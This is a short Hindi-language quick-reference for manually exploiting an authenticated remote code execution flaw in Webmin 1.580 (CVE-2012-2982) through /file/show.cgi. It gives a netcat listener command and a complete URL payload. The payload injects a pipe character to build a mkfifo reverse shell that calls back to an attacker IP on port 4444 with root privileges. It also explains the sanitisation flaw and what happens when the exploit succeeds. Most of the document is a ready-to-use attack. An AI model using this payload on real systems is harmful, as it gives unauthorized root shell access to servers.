
मैन्युअल, गैर-Metasploit प्रमाणित रिमोट कोड निष्पादन (RCE) शोषण ब्राउज़र URL बार के माध्यम से Webmin 1.580 (CVE-2012-2982) के लिए
Webmin 1.580 पर /file/show.cgi घटक के माध्यम से प्रमाणित रिमोट कोड निष्पादन (RCE) निष्पादित करने के लिए त्वरित संदर्भ।
पेलोड निष्पादित करने से पहले आने वाले कनेक्शन को पकड़ने के लिए अपनी स्थानीय मशीन पर यह कमांड चलाएँ:
rlwrap nc -lnvp 4444
निम्नलिखित URL को सीधे अपने ब्राउज़र के एड्रेस बार में चिपकाएँ (सुनिश्चित करें कि आप पहले से ही Webmin डैशबोर्ड में लॉग इन हैं):
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
नोट: <YOUR_ATTACK_IP> को अपने वास्तविक स्थानीय या टनल IP पते से बदलना याद रखें, साथ ही लक्ष्य का IP और PORT भी।

कमजोरी: /file/show.cgi में Perl के आंतरिक open() फंक्शन को पास की गई इनलाइन पथ जानकारी का अपर्याप्त स्वच्छीकरण। पाइप कैरेक्टर (|) जोड़ने से रूट विशेषाधिकारों के साथ मनमाना कमांड निष्पादन की अनुमति मिलती है।
प्रमाणीकरण: इसके लिए एक सक्रिय सत्र की आवश्यकता होती है। जब आप URL पेलोड सबमिट करते हैं तो ब्राउज़र आपके सक्रिय सत्र कुकीज़ भेजकर स्वचालित रूप से प्रमाणीकरण संभालता है।
अपेक्षित व्यवहार: Enter दबाने के बाद, ब्राउज़र टैब घूमेगा और अनिश्चित काल के लिए लटका हुआ दिखाई देगा। यह पुष्टि करता है कि सर्वर थ्रेड को सफलतापूर्वक हाईजैक कर लिया गया है ताकि इंटरैक्टिव शेल सत्र बना रहे।